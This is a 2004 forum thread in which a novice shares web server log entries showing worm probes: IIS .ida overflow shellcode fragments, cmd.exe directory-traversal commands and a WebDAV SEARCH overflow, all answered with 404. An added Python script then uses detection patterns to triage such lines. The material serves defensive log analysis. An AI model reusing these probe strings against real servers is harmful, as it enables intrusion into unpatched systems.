Access_log - help!!!????

vincenzobar

I am getting what's below in my access_log.1. I am not good at reading logs yet (I am a newbie), so can someone help me a little?

I noticed the call for the Windows command prompt and other weird things. Is this port scanning and hacker attempts? If so, what should I do?

Code:
69.46.204.42 - - [08/Aug/2004:09:46:26 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\…………. 

69.136.130.155 - - [08/Aug/2004:22:40:29 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 - "-" "-"
@
@
@
@
@
………

196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

66.78.26.26 - - [10/Aug/2004:02:12:03 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 373 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 388 "-" "-"
@


Thanks in advance!
 
Thanks for the link, very informative!!!!!

That Microsoft redirect was funny as hell, I thought!!!!

Well, I guess I just take it and like it... damn worms!

One last question: which files should I be looking at most closely for hacker attempts and success?

thanks for the response!

-vin
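
Added example, not part of the original thread: a small triage pass over access_log lines shaped like the ones posted above, separating probes the server rejected from responses that deserve a closer look. It assumes Apache's common/combined log format; the signature labels, the `triage` function name and the final sample line (documentation address, 200 status) are this example's own.

```python
import re
from collections import Counter

# Apache common/combined format: host ident user [time] "request" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) \S+')

# Request shapes seen in the thread's excerpt; the labels are this example's own.
SIGNATURES = [
    ("ida-overflow", re.compile(r"\.ida\?.*%u[0-9a-f]{4}", re.I)),
    ("cmd-exe-traversal", re.compile(r"(%255c|%5c|\.\./).*cmd\.exe", re.I)),
    ("search-binary-uri", re.compile(r"SEARCH /(\\x[0-9a-f]{2}){4,}", re.I)),
]

def triage(lines):
    """Return (findings, noisy_hosts) for an iterable of access_log lines."""
    findings, errors = [], Counter()
    for raw in lines:
        m = LINE_RE.match(raw)
        host = m.group(1) if m else raw.split(" ", 1)[0]
        # Truncated lines carry no status; match on the raw text instead.
        text, status = (m.group(2), int(m.group(3))) if m else (raw, None)
        label = next((n for n, rx in SIGNATURES if rx.search(text)), None)
        if label is None:
            if status is not None and status >= 400:
                errors[host] += 1   # unlabelled 4xx/5xx: count per host
            continue
        if status is None:
            outcome = "unknown"     # cannot tell from this line alone
        elif status >= 400:
            outcome = "rejected"    # server refused or found nothing
        else:
            outcome = "review"      # 2xx/3xx to a probe needs a closer look
        findings.append((host, label, outcome))
    return findings, {h: n for h, n in errors.items() if n >= 3}

# Constructed sample: lines abridged from the excerpt above; the last one is
# hypothetical (documentation address, 200 status) to show the "review" case.
SAMPLE = [
    r'69.46.204.42 - - [08/Aug/2004:09:46:26 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1',
    '69.136.130.155 - - [08/Aug/2004:22:40:29 -0400] "GET /default.ida?XXXX%u9090%u6858%ucbd3%u7801%u00=a HTTP/1.0" 404 - "-" "-"',
    '196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"',
] + ['66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"'] * 3 + [
    '192.0.2.10 - - [10/Aug/2004:03:00:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512 "-" "-"',
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Every labelled request in the posted excerpt ends in a 404, so it lands in the "rejected" bucket; a "review" verdict is a prompt to inspect that response, not proof that anything succeeded.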
 